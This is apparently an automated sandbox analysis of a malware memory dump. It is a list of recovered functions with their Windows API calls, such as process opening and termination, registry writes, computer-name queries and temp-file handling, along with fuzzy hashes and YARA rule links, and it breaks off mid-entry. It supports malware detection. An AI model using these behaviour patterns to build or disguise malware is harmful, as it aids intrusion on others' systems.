Opcode ID: 825cb361126a21a0a0bd5e2e1443c795d38c9e76ee2ab8e26708fd3d17635c65
Instruction ID: 3e48035828afdf77e71add4f76ca4a398b8704750e95963a9d25f8174d6f0223
Opcode Fuzzy Hash: 825cb361126a21a0a0bd5e2e1443c795d38c9e76ee2ab8e26708fd3d17635c65
Instruction Fuzzy Hash: DF418C35900318AFDB22EFA5CCC4EAEBBA9EF04354F089565FD05AB160D7749A50DB90

Uniqueness

Uniqueness Score: -1.00%

Function 03344F5A, Relevance: 10.6, APIs: 7, Instructions: 124threadstringCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 03344F9B
GetWindowThreadProcessId.USER32(00000000,?), ref: 03344FC9
GetWindowThreadProcessId.USER32(?,?), ref: 0334500E
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 03345036
_strupr.NTDLL ref: 03345061
lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000104), ref: 0334506E
CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000104), ref: 03345088

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: ProcessThread$Window$CloseCurrentHandleOpen_struprlstrlen
String ID:
API String ID: 3831658075-0
Opcode ID: 6b17f2469feba003a6171581979a81c5ba1698363665d67c6e0c2323c7ee962b
Instruction ID: f048fc0b041a2391c9acee5e4ed5a6f41b1593473b88eb26acba19f2b1559ea2
Opcode Fuzzy Hash: 6b17f2469feba003a6171581979a81c5ba1698363665d67c6e0c2323c7ee962b
Instruction Fuzzy Hash: 12412A35D00219EFDF21EFA5CCC9BEEBBB9AF49700F148056E600A6150D778AA40DF91

Uniqueness

Uniqueness Score: -1.00%

Function 03361D92, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,03356072,00000000), ref: 03361DAC
RtlAllocateHeap.NTDLL(00000000,00000024), ref: 03361DC1
memset.NTDLL ref: 03361DCE
HeapFree.KERNEL32(00000000,00000000,?,03356071,?,?,00000000,?,00000000,03349E0F,?,00000000), ref: 03361DEB
memcpy.NTDLL(?,?,03356071,?,03356071,?,?,00000000,?,00000000,03349E0F,?,00000000), ref: 03361E0C

Strings

chun, xrefs: 03361E88

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Heap$Allocate$Freememcpymemset
String ID: chun
API String ID: 2362494589-3058818181
Opcode ID: 1dc73da73702e8710e1e56fc52ed24e7ad3f13fe60967a8b42d16c2bfbf86789
Instruction ID: 2d82a996902a5d94e31b90ac2e1604e5beb02c1b5e7f7d77ab2dd2cdff9586a2
Opcode Fuzzy Hash: 1dc73da73702e8710e1e56fc52ed24e7ad3f13fe60967a8b42d16c2bfbf86789
Instruction Fuzzy Hash: 65313976900705AFD730DF56DC80A6BBBEDEB09310F04892AE959DB664D770E905CB90

Uniqueness

Uniqueness Score: -1.00%

Function 03345F09, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91memoryfilestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0335E55D: GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,03367545,00002334,?,?,?,?,033412DF,?), ref: 0335E56F
Part of subcall function 0335E55D: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,03367545,00002334,?,?,?,?,033412DF), ref: 0335E588
Part of subcall function 0335E55D: GetCurrentThreadId.KERNEL32 ref: 0335E595
Part of subcall function 0335E55D: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,03367545,00002334,?,?,?,?,033412DF,?), ref: 0335E5A1
Part of subcall function 0335E55D: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,03367545,00002334), ref: 0335E5AF
Part of subcall function 0335E55D: lstrcpy.KERNEL32(00000000), ref: 0335E5D1

lstrlen.KERNEL32(00000000,?,00000F00), ref: 03345F2D

Part of subcall function 03347AB7: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,0336756B,?,00000000,?,00002334), ref: 03347AC8
Part of subcall function 03347AB7: lstrlen.KERNEL32(?,?,?,?,?,?,0336756B,?,00000000,?,00002334,?,?,?,?,033412DF), ref: 03347ACF
Part of subcall function 03347AB7: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 03347AE1
Part of subcall function 03347AB7: _snprintf.NTDLL ref: 03347B07
Part of subcall function 03347AB7: _snprintf.NTDLL ref: 03347B3B
Part of subcall function 03347AB7: HeapFree.KERNEL32(00000000,00000000,00000000,?), ref: 03347B58

StrTrimA.SHLWAPI(00000000, s:,?,?,?,?,000000FF,?,00000F00), ref: 03345FC7
HeapFree.KERNEL32(00000000,?,000000FF,?,00000F00), ref: 03345FE4
DeleteFileA.KERNEL32(00000000,00000000,?,?,?,00000000,000000FF,?,00000F00), ref: 03345FEC
HeapFree.KERNEL32(00000000,00000000,?,00000000,000000FF,?,00000F00), ref: 03345FFB

Strings

s:, xrefs: 03345FBD

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Heap$FileFreeTemplstrlen$PathTime_snprintf$AllocateCurrentDeleteNameSystemThreadTrimlstrcpy
String ID: s:
API String ID: 2960378068-2363032815
Opcode ID: 64a8eb74442604a4c4d9d9a323254dc3ccc4b3cb316a031f73a63b74361b7558
Instruction ID: 6bd8c8b0a884961e9cca928d2d2604397716baef40f344066341342af7e4e933
Opcode Fuzzy Hash: 64a8eb74442604a4c4d9d9a323254dc3ccc4b3cb316a031f73a63b74361b7558
Instruction Fuzzy Hash: 2F312976E00209EFDB20EFE9CCC4F9FBBECAB09310F144555E515E6245EB74AA058B61

Uniqueness

Uniqueness Score: -1.00%

Function 0334C34B, Relevance: 10.6, APIs: 7, Instructions: 83stringfileCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(00000000), ref: 0334C361
lstrcmpiW.KERNEL32(00000000,?), ref: 0334C399
lstrcmpiW.KERNEL32(?,?), ref: 0334C3AE
lstrlenW.KERNEL32(?), ref: 0334C3B5
CloseHandle.KERNEL32(?), ref: 0334C3DD
DeleteFileW.KERNEL32(?,?,?,?,?,?), ref: 0334C409
RtlLeaveCriticalSection.NTDLL(00000000), ref: 0334C427

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: CriticalSectionlstrcmpi$CloseDeleteEnterFileHandleLeavelstrlen
String ID:
API String ID: 1496873005-0
Opcode ID: dc79a11fd8ebfef7484e8650cbdde24889a9b71d6bd720e43d4b12b9773ca6ae
Instruction ID: 5b91ec5ec0feff1a389c588284dfd8a20bb5d5ca8d4ca562a12fc8dced345520
Opcode Fuzzy Hash: dc79a11fd8ebfef7484e8650cbdde24889a9b71d6bd720e43d4b12b9773ca6ae
Instruction Fuzzy Hash: 46217F76901309BFDB21EFA2DDC8EAAB7FCEF04344F085165E902D6105EB34E9458B60

Uniqueness

Uniqueness Score: -1.00%

Function 0335F7CD, Relevance: 10.6, APIs: 7, Instructions: 76memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(0334FDC3,00000000,03371480,033714A0,?,?,0334FDC3,0335B262,03371480), ref: 0335F7DD
RtlAllocateHeap.NTDLL(00000000,00000002), ref: 0335F7F3
lstrlen.KERNEL32(0335B262,?,?,0334FDC3,0335B262,03371480), ref: 0335F7FB
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0335F807
lstrcpy.KERNEL32(03371480,0334FDC3), ref: 0335F81D
HeapFree.KERNEL32(00000000,00000000,?,?,0334FDC3,0335B262,03371480), ref: 0335F871
HeapFree.KERNEL32(00000000,03371480,?,?,0334FDC3,0335B262,03371480), ref: 0335F880

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Heap$AllocateFreelstrlen$lstrcpy
String ID:
API String ID: 1531811622-0
Opcode ID: 92c4e9e4f5664c0ac4c1306dfa36caf6f5372124f09ae8b850d5b4fa3641f6af
Instruction ID: 96acb3955d5f31337ba72c78e43e44f88470d823e544246ec59a9e54808b0eed
Opcode Fuzzy Hash: 92c4e9e4f5664c0ac4c1306dfa36caf6f5372124f09ae8b850d5b4fa3641f6af
Instruction Fuzzy Hash: 25210436504644FFEB229F29DCC4F6ABFAEEB46344F184069F89897214C7359C16CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0335CBE2, Relevance: 10.6, APIs: 7, Instructions: 71filememoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0335E55D: GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,03367545,00002334,?,?,?,?,033412DF,?), ref: 0335E56F
Part of subcall function 0335E55D: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,03367545,00002334,?,?,?,?,033412DF), ref: 0335E588
Part of subcall function 0335E55D: GetCurrentThreadId.KERNEL32 ref: 0335E595
Part of subcall function 0335E55D: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,03367545,00002334,?,?,?,?,033412DF,?), ref: 0335E5A1
Part of subcall function 0335E55D: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,03367545,00002334), ref: 0335E5AF
Part of subcall function 0335E55D: lstrcpy.KERNEL32(00000000), ref: 0335E5D1

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00001ED2,?,00000000,?,?,033412F0,00000000), ref: 0335CC23
HeapFree.KERNEL32(00000000,00000000,?,00000000,00001ED2,?,00000000,?,?,033412F0,00000000,?,00000006,?), ref: 0335CC96

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: FileTemp$PathTime$CreateCurrentFreeHeapNameSystemThreadlstrcpy
String ID:
API String ID: 2078930461-0
Opcode ID: 9fea21c8b2632ed9e24dcbfb4d10fa9fa6b292ae81912211057c6709d45001c3
Instruction ID: 78ff47da4d1bdc4cc0fddf3677f76bc921484b85d7a34d1c5eee9636a8939e09
Opcode Fuzzy Hash: 9fea21c8b2632ed9e24dcbfb4d10fa9fa6b292ae81912211057c6709d45001c3
Instruction Fuzzy Hash: 49113132544714BFC331BA22ECC8F6FBE6CEB01B64F004222FA11951A0EA2948558BE0

Uniqueness

Uniqueness Score: -1.00%

Function 0335D91E, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 03358AB1: lstrlen.KERNEL32(00000000,00000000,7691C740,74E481D0,?,?,?,0335D938,?,00000000,7691C740,74E481D0,?,?,033584A7,00000000), ref: 03358B18
Part of subcall function 03358AB1: sprintf.NTDLL ref: 03358B39

lstrlen.KERNEL32(00000000,?,00000000,7691C740,74E481D0,?,?,033584A7,00000000,0644C0E0), ref: 0335D949
lstrlen.KERNEL32(?,?,?,033584A7,00000000,0644C0E0), ref: 0335D951

Part of subcall function 03345E9A: RtlAllocateHeap.NTDLL(00000000,00000001,0335295C), ref: 03345EA6

strcpy.NTDLL ref: 0335D968
lstrcat.KERNEL32(00000000,?), ref: 0335D973

Part of subcall function 03360C80: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,0335D982,00000000,?,?,?,033584A7,00000000,0644C0E0), ref: 03360C97

Part of subcall function 03360757: HeapFree.KERNEL32(00000000,00000000,033529D3,00000000), ref: 03360763

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,033584A7,00000000,0644C0E0), ref: 0335D990

Part of subcall function 0334F77D: lstrlen.KERNEL32(?), ref: 0334F787
Part of subcall function 0334F77D: _snprintf.NTDLL ref: 0334F7E5

Strings

=, xrefs: 0335D98A

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: 3cc9b351caae9029a617e0c36b4aaab09da3313cf2f427298fba01cf13c03cbf
Instruction ID: 64ac3ec4583d4fe453bd5442d4de48e0b0526d7eae6600489fc68da7ba0f8b7d
Opcode Fuzzy Hash: 3cc9b351caae9029a617e0c36b4aaab09da3313cf2f427298fba01cf13c03cbf
Instruction Fuzzy Hash: C411C63BD05625BF8722FBB49CC8CAE7A9C9E456507098015FD049F108DF39DD019BA1

Uniqueness

Uniqueness Score: -1.00%

Function 03350CCF, Relevance: 10.6, APIs: 7, Instructions: 62memorysynchronizationCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?), ref: 03350D00
wcstombs.NTDLL ref: 03350D11

Part of subcall function 03345570: StrChrA.SHLWAPI(033711D4,0000002E,00000000,00000000,?,033711D4,0334E415,00000000,00000000,00000000), ref: 03345582
Part of subcall function 03345570: StrChrA.SHLWAPI(00000004,00000020,?,033711D4,0334E415,00000000,00000000,00000000), ref: 03345591

OpenProcess.KERNEL32(00000001,00000000,?,00000000), ref: 03350D32
TerminateProcess.KERNEL32(00000000,00000000), ref: 03350D41
CloseHandle.KERNEL32(00000000), ref: 03350D48
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 03350D57
WaitForSingleObject.KERNEL32(00000000), ref: 03350D67

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: HeapProcess$AllocateCloseFreeHandleObjectOpenSingleTerminateWaitwcstombs
String ID:
API String ID: 417118235-0
Opcode ID: 1ee6d4a95dfc8369667febf462ba9c0ccdfd0461e1767a025206e13be4484724
Instruction ID: fcefe9107fe83414d20d05004db4fef0d193efeafd91934286441dc30df00426
Opcode Fuzzy Hash: 1ee6d4a95dfc8369667febf462ba9c0ccdfd0461e1767a025206e13be4484724
Instruction Fuzzy Hash: 8F119031500615FFD721AB56DCC9FAAFBADEB04355F044010F905961A0C7BAA8508FA0

Uniqueness

Uniqueness Score: -1.00%

Function 03346A9F, Relevance: 10.6, APIs: 7, Instructions: 57memoryregistrystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(0335B262,00000000,00000000,033714A0,?,?,0334FDD2,0335B262,00000000,0335B262,03371480), ref: 03346AB2
RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 03346AC0
wsprintfA.USER32 ref: 03346ADC
RegCreateKeyA.ADVAPI32(80000001,03371480,00000000), ref: 03346AF4
lstrlen.KERNEL32(?), ref: 03346B03
RegCloseKey.ADVAPI32(?), ref: 03346B1C
HeapFree.KERNEL32(00000000,00000000), ref: 03346B2B

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Heaplstrlen$AllocateCloseCreateFreewsprintf
String ID:
API String ID: 3908752696-0
Opcode ID: 3f38595d1dee255faecfd0b245ab77537cbc38f8f76b88aceb16321ba3c18416
Instruction ID: a0f34b0072eb140fe3536da7450d1867046b9617381286f9c3ffc7b95c49cfd7
Opcode Fuzzy Hash: 3f38595d1dee255faecfd0b245ab77537cbc38f8f76b88aceb16321ba3c18416
Instruction Fuzzy Hash: 83118B36500108FFEB216F95ECC9EAA3FBDEB48308F004025FA00D6164DB719D149B60

Uniqueness

Uniqueness Score: -1.00%

Function 0334407F, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?), ref: 033440A0
GetProcAddress.KERNEL32(00000000,?), ref: 033440B9
OpenProcess.KERNEL32(00000400,00000000,?), ref: 033440D6
IsWow64Process.KERNEL32(?,?), ref: 033440E7
CloseHandle.KERNEL32(?,?,?), ref: 033440FA

Strings

PWt, xrefs: 0334408C, 033440BF, 033440E7

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: HandleProcess$AddressCloseModuleOpenProcWow64
String ID: PWt
API String ID: 4157061983-1902262044
Opcode ID: 919a2bc18feae2a7568dcebe5cac472fac350d4a38ecda437c30d712a72da702
Instruction ID: 6b8f75c168d7a17e4fa312d42337ab2bf6ea6b0f0dfcc3487e504cd36ddc1949
Opcode Fuzzy Hash: 919a2bc18feae2a7568dcebe5cac472fac350d4a38ecda437c30d712a72da702
Instruction Fuzzy Hash: 4F01D676800614EFCB30EF67ECC8999BBFCFB44341B144125E805D3104E7306A41DB50

Uniqueness

Uniqueness Score: -1.00%

Function 0334AD59, Relevance: 9.2, APIs: 6, Instructions: 202synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 03345E9A: RtlAllocateHeap.NTDLL(00000000,00000001,0335295C), ref: 03345EA6

GetLastError.KERNEL32(?,?,?,00001000), ref: 0334ADDA
WaitForSingleObject.KERNEL32(00000000,00000000,?,?), ref: 0334AE5F
CloseHandle.KERNEL32(00000000), ref: 0334AE79
OpenProcess.KERNEL32(00100000,00000000,00000000,?,?), ref: 0334AEAE

Part of subcall function 03344164: RtlReAllocateHeap.NTDLL(00000000,00000000,00000000,03356B51), ref: 03344174

WaitForSingleObject.KERNEL32(?,00000064), ref: 0334AF30
CloseHandle.KERNEL32(?), ref: 0334AF57

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: AllocateCloseHandleHeapObjectSingleWait$ErrorLastOpenProcess
String ID:
API String ID: 3115907006-0
Opcode ID: 04a16b90d753623de28a3c5bf2ecab62b5d647b7475ca631988d34cc5f78a67d
Instruction ID: 722457b78ce36ed2696e063c1602227ed74b2aaf8dc817d73bc4f59647156f04
Opcode Fuzzy Hash: 04a16b90d753623de28a3c5bf2ecab62b5d647b7475ca631988d34cc5f78a67d
Instruction Fuzzy Hash: 71810275D40219EFDB11DF98C8C4AAEFBF9FF08341F148469E915AB260D731A991CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03352B2B, Relevance: 9.2, APIs: 6, Instructions: 200timestringCOMMON

Download Yara Rule

APIs

Part of subcall function 03345E9A: RtlAllocateHeap.NTDLL(00000000,00000001,0335295C), ref: 03345EA6

FileTimeToLocalFileTime.KERNEL32(00000000,03361704), ref: 03352B8D
FileTimeToSystemTime.KERNEL32(03361704,?), ref: 03352B9B
lstrlenW.KERNEL32(00000010), ref: 03352BAB
lstrlenW.KERNEL32(00000218), ref: 03352BB7
FileTimeToLocalFileTime.KERNEL32(00000008,03361704), ref: 03352CA4
FileTimeToSystemTime.KERNEL32(03361704,?), ref: 03352CB2

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Time$File$LocalSystemlstrlen$AllocateHeap
String ID:
API String ID: 1122361434-0
Opcode ID: 498be395d1db5c62c7079c8acbd24ec676e397f986e5e00f011b7fb365bb394c
Instruction ID: 2798e0aaf662d94391090535c7ac1790ab51950c41c75daf05ea64953bd0e189
Opcode Fuzzy Hash: 498be395d1db5c62c7079c8acbd24ec676e397f986e5e00f011b7fb365bb394c
Instruction Fuzzy Hash: 6B71EC71A00619AFCB60DFA9C8C4EEEB7FCAB08304F044466F915D7255E734DA45DB64

Uniqueness

Uniqueness Score: -1.00%

Function 0335D5EA, Relevance: 9.1, APIs: 6, Instructions: 124memoryCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL(?), ref: 0335D603

Part of subcall function 03356C9D: lstrlenW.KERNEL32(00000000,74E5F560,00000000,?,00000000), ref: 03356CC9
Part of subcall function 03356C9D: RtlAllocateHeap.NTDLL(00000000,?), ref: 03356CDB
Part of subcall function 03356C9D: CreateDirectoryW.KERNEL32(00000000,00000000), ref: 03356CF8
Part of subcall function 03356C9D: lstrlenW.KERNEL32(00000000), ref: 03356D04
Part of subcall function 03356C9D: HeapFree.KERNEL32(00000000,00000000), ref: 03356D18

RtlEnterCriticalSection.NTDLL(00000000), ref: 0335D63B
CloseHandle.KERNEL32(?), ref: 0335D649
HeapFree.KERNEL32(00000000,?,?,00000001,?,?,00001000,?,?,00001000), ref: 0335D722
RtlLeaveCriticalSection.NTDLL(00000000), ref: 0335D731
HeapFree.KERNEL32(00000000,00000000,?,?,00001000,?,?,00001000), ref: 0335D744

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Heap$Free$CriticalSectionlstrlen$AllocateCloseCreateDirectoryEnterHandleHeaderImageLeave
String ID:
API String ID: 1719504581-0
Opcode ID: cfec34252ad325e4be4b26cc752ef45eda7b6c59b6e6e71d83951884150c7d53
Instruction ID: e2162c5ae422081691d563c208dbcf3d8547ed42321f3472d22cd9631761bde4
Opcode Fuzzy Hash: cfec34252ad325e4be4b26cc752ef45eda7b6c59b6e6e71d83951884150c7d53
Instruction Fuzzy Hash: 7341703A901615AFDB22EF95DCC4F9ABBBDEB44710F444069FD04AB254D730E945CB90

Uniqueness

Uniqueness Score: -1.00%

Function 03353C08, Relevance: 9.1, APIs: 6, Instructions: 122threadCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,?,?), ref: 03353C63
GetLastError.KERNEL32(?), ref: 03353C89
SetEvent.KERNEL32(00000000,?), ref: 03353C9C
GetModuleHandleA.KERNEL32(00000000), ref: 03353CE5
memset.NTDLL ref: 03353CFA
RtlExitUserThread.NTDLL(?,?), ref: 03353D2F

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: HandleModule$ErrorEventExitLastThreadUsermemset
String ID:
API String ID: 3978817377-0
Opcode ID: 8172854340cc7ae4ed2df62c293d385a775764661654f328995fbfc749ee33d2
Instruction ID: 4f8ef7feb04619646a25119f90c3ce0808b719ec2bb1c14d4e2c24d933257907
Opcode Fuzzy Hash: 8172854340cc7ae4ed2df62c293d385a775764661654f328995fbfc749ee33d2
Instruction Fuzzy Hash: 51417E75A00704AFCB21DFA9CDC8DAEFBBDEB45761B284559F806D2504D730A944CB20

Uniqueness

Uniqueness Score: -1.00%

Function 0334EF6E, Relevance: 9.1, APIs: 6, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03da816bfd8e12c545a26cb3963f0f33a0477fac00c59db40d4e3b2c758237bf
Instruction ID: 5d24891ee06aa48f44051171f911f97470617e1e21735606c82f71ac08715181
Opcode Fuzzy Hash: 03da816bfd8e12c545a26cb3963f0f33a0477fac00c59db40d4e3b2c758237bf
Instruction Fuzzy Hash: 7241A0B1904710AFD730EF758CC895BBBECFB88365F184A2DE6A6C6580E774A8458F50

Uniqueness

Uniqueness Score: -1.00%

Function 0335BCB6, Relevance: 9.1, APIs: 6, Instructions: 108stringsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 0335A406: lstrlen.KERNEL32(?,00000008,-00000007,?,00000000,0334D4C8,?,00000000,-00000007,0335F475,-00000007,?,00000000), ref: 0335A415
Part of subcall function 0335A406: mbstowcs.NTDLL ref: 0335A431

lstrlenW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000006,?), ref: 0335BD09

Part of subcall function 0334BAF2: lstrlenW.KERNEL32(?,00000000,74E069A0,?,00000250,?,00000000), ref: 0334BB3E
Part of subcall function 0334BAF2: lstrlenW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000006,?), ref: 0334BB4A
Part of subcall function 0334BAF2: memset.NTDLL ref: 0334BB92
Part of subcall function 0334BAF2: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0334BBAD
Part of subcall function 0334BAF2: lstrlenW.KERNEL32(0000002C), ref: 0334BBE5
Part of subcall function 0334BAF2: lstrlenW.KERNEL32(?), ref: 0334BBED
Part of subcall function 0334BAF2: memset.NTDLL ref: 0334BC10
Part of subcall function 0334BAF2: wcscpy.NTDLL ref: 0334BC22

PathFindFileNameW.SHLWAPI(00000000,00000000,?,?,00000000,00000000,00000000), ref: 0335BD2A
lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000006,?), ref: 0335BD56

Part of subcall function 0334BAF2: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 0334BC48
Part of subcall function 0334BAF2: RtlEnterCriticalSection.NTDLL(?), ref: 0334BC7E
Part of subcall function 0334BAF2: RtlLeaveCriticalSection.NTDLL(?), ref: 0334BC9A
Part of subcall function 0334BAF2: FindNextFileW.KERNEL32(?,00000000), ref: 0334BCB3
Part of subcall function 0334BAF2: WaitForSingleObject.KERNEL32(00000000), ref: 0334BCC5
Part of subcall function 0334BAF2: FindClose.KERNEL32(?), ref: 0334BCDA
Part of subcall function 0334BAF2: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0334BCEE
Part of subcall function 0334BAF2: lstrlenW.KERNEL32(0000002C), ref: 0334BD10

LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 0335BD73
WaitForSingleObject.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000), ref: 0335BD94
PathFindFileNameW.SHLWAPI(0000001E,?,?,?,?,?,?,?,?,?,?,00000006,?), ref: 0335BDA9

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: lstrlen$Find$File$NamePath$CriticalFirstObjectSectionSingleWaitmemset$CloseEnterFreeLeaveLocalNextmbstowcswcscpy
String ID:
API String ID: 2670873185-0
Opcode ID: dba137a25a6906c4909616f6f1c62f18c22a34bfadf15df21a84e9808e1beb5a
Instruction ID: 5e7fda7febdf582bd4dd89fe80c6f6d583c621d0af4dced2061f1a04c5254cec
Opcode Fuzzy Hash: dba137a25a6906c4909616f6f1c62f18c22a34bfadf15df21a84e9808e1beb5a
Instruction Fuzzy Hash: 743117B2504305AFCB21EF65CCC4C6EFBEDFB88298F05492AF99597120EB31D9059B52

Uniqueness

Uniqueness Score: -1.00%

Function 033459C8, Relevance: 9.1, APIs: 6, Instructions: 98memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?), ref: 03345A05
HeapFree.KERNEL32(00000000,?), ref: 03345A3B
GetComputerNameW.KERNEL32(00000000,?), ref: 03345A49
RtlAllocateHeap.NTDLL(00000000,?), ref: 03345A60
GetComputerNameW.KERNEL32(00000000,?), ref: 03345A71
HeapFree.KERNEL32(00000000,00000000), ref: 03345A97

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Heap$AllocateComputerFreeName
String ID:
API String ID: 3439771632-0
Opcode ID: e1091e87630aec0bae0a00276012dee7f9aae620dad53630de1c6560de92ba60
Instruction ID: 58ef98092ad1e0a02cbf5d04fc7087b3b6593bcf96ac77bfdbf6f2f36b3cf2d9
Opcode Fuzzy Hash: e1091e87630aec0bae0a00276012dee7f9aae620dad53630de1c6560de92ba60
Instruction Fuzzy Hash: F831F7B6E00209EFDB10EFA5DDC48AEBBFDEB44304B148569E505D3214E734EA459F60

Uniqueness

Uniqueness Score: -1.00%

Function 03359F4D, Relevance: 9.1, APIs: 6, Instructions: 91timememoryCOMMON

Download Yara Rule

APIs

OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 03359F67
CreateWaitableTimerA.KERNEL32(03371248,00000003,?), ref: 03359F84
GetLastError.KERNEL32(?,?,03342212,?), ref: 03359F95

Part of subcall function 03344C22: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,?,7673D3B0,74E05520,?,?,?,03341F86,?), ref: 03344C5A
Part of subcall function 03344C22: RtlAllocateHeap.NTDLL(00000000,?), ref: 03344C6E
Part of subcall function 03344C22: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,?,03341F86,?,?,?), ref: 03344C88
Part of subcall function 03344C22: RegCloseKey.ADVAPI32(?,?,?,?,03341F86,?,?,?), ref: 03344CB2

GetSystemTimeAsFileTime.KERNEL32(?,00000000,03342212,?,?,?,03342212,?), ref: 03359FD5
SetWaitableTimer.KERNEL32(?,03342212,00000000,00000000,00000000,00000000,?,?,03342212,?), ref: 03359FF4
HeapFree.KERNEL32(00000000,03342212,00000000,03342212,?,?,?,03342212,?), ref: 0335A00A

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: TimerWaitable$HeapQueryTimeValue$AllocateCloseCreateErrorFileFreeLastOpenSystem
String ID:
API String ID: 1835239314-0
Opcode ID: d93f59f8d502e343f5cb45e94ea435502fbc77cfe9650d8214c69d900f70b860
Instruction ID: 9138d120bb5569951bcf247900cb401ac554448272130b4a30b0669bf073194b
Opcode Fuzzy Hash: d93f59f8d502e343f5cb45e94ea435502fbc77cfe9650d8214c69d900f70b860
Instruction Fuzzy Hash: AC312872910248EFCB22EF96CCC9CAEBBBDEB88351F148555F906E7100D3349A40DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 03341AE3, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON

Download Yara Rule

APIs

